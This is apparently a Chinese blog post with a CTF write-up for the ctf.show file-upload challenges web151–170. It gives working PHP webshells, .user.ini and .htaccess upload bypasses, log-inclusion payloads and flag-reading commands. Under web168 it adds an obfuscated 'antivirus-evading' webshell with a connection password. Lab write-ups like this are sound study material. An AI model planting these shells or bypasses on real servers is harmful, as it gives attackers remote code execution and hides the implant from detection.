文件上传&CTF秀

无聊的知识

已于 2022-07-30 15:01:59 修改

阅读量308

点赞数 3

分类专栏： web渗透文章标签： web安全安全

于 2022-05-20 08:59:41 首次发布

本文链接：https://blog.csdn.net/weixin_54882883/article/details/124876314

版权

web渗透专栏收录该内容

43 篇文章 6 订阅

订阅专栏

在这里插入图片描述

蓝易云高性能服务器

在这里插入图片描述

🤤🤤🤤🤤🤤🤤点击购买吧-年付送定制U盘

CTF秀

文件上传

web151

在这里插入图片描述

第一个非常简单

是js验证的

在这里插入图片描述

改一下就可以了

https://blog.csdn.net/weixin_45551083/article/details/110289593

web152

这第二关就是类型上的绕过

你会发现他支持png的不支持jpg的

那么我们只需要改一下他的类型就可以了

在这里插入图片描述

用蚁剑去连接

在这里插入图片描述

web153

后缀变异

php5

在这里插入图片描述

但是呢这虽然可以绕过但是不能连接上前

这就是解析上的一个问题了

那么我们怎么绕过并且连接上去呢

由于对方是nightj不是我们的apache

所有我们不能用解析器饶过

但是nighit可以用user.in绕过

user.ini

auto_prepend_file = 1.png

这就是user.in去包含1.png这个文件

木马

phpinfo();
@eval($_POST['shell']);

我没实验成功

https://blog.csdn.net/weixin_45551083/article/details/110289593

https://blog.csdn.net/Xxy605/article/details/116169015

web154

首先上传.user.ini

然后上1.png

<?php
@eval($_POST['shell']);
?>

然后访问index.php

POST输入

shell=system(“tac …/fl*”);

或者

shell=system(“tac …/flag.php”);

在这里插入图片描述

web155

https://blog.csdn.net/Xxy605/article/details/116169015

web156

156 JS验证+user.ini+短标签+过滤

.user.ini

.user.ini：auto_prepend_file=test.png

test.png

<?=eval($_POST{x});?>

在这里插入图片描述

x=system("tac ../fl*");

x=system("tac ../flag.php");

web157-web158

.user.ini

auto_append_file=157.png

157.png

<?=(system("tac ../fl*"))?>

在这里插入图片描述

web159

159.png

<?=`tac ../fl*`?>

.user.ini

auto_append_file=159.png

在这里插入图片描述

web160

.user.ini

auto_prepend_file=test.png

test.png

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

web161

.user.ini

GIF89A auto_prepend_file=test.png

test.png

GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?>

web162

https://blog.csdn.net/weixin_45551083/article/details/110289593

https://blog.csdn.net/Xxy605/article/details/116169015

web163

.user.ini

GIF89A
auto_append_file=/tmp/sess_hahaha

https://blog.csdn.net/Xxy605/article/details/116169015

web164-web165

https://blog.csdn.net/Xxy605/article/details/116169015

web166

166.zip

<?=`tac ../fl*`?>

在这里插入图片描述

上传上去

然后

在这里插入图片描述

http://1d21c2ea-7a90-44cd-b342-6797f8837017.challenge.ctf.show/upload/download.php?file=ea34f77e6245c7670d133dffeb460dd2.zip

下载下来

在这里插入图片描述

web167

他只允许上传jpg文件

我们就上传jpg文件任何抓包

再改成.htaccess文件

.htaccess

SetHandler application/x-httpd-php

1.jpg文件

<?php system("tac ../fl*");?>

https://blog.csdn.net/Xxy605/article/details/116169015

然后访问

/upload/1.jpg

在这里插入图片描述

web168

上传png

然后改成php

免杀木马

<?php
	$a=strrev("metsys");
	$a($_REQUEST[0]);
?>

// 使用时请删除此行, 连接密码: TyKPuntU ?>
<?php 

<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

web169

web170

在这里插入图片描述

无聊的知识

关注

3
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
文件上传&CTF秀

CTF秀文件上传web151第一个非常简单是js验证的改一下就可以了https://blog.csdn.net/weixin_45551083/article/details/110289593web152这第二关就是类型上的绕过你会发现他支持png的不支持jpg的那么我们只需要改一下他的类型就可以了用蚁剑去连接web153后缀变异php5但是呢这虽然可以绕过但是不能连接上前这就是解析上的一个问题了那么我们怎么绕过并且连接上去呢由于对方是n
复制链接

扫一扫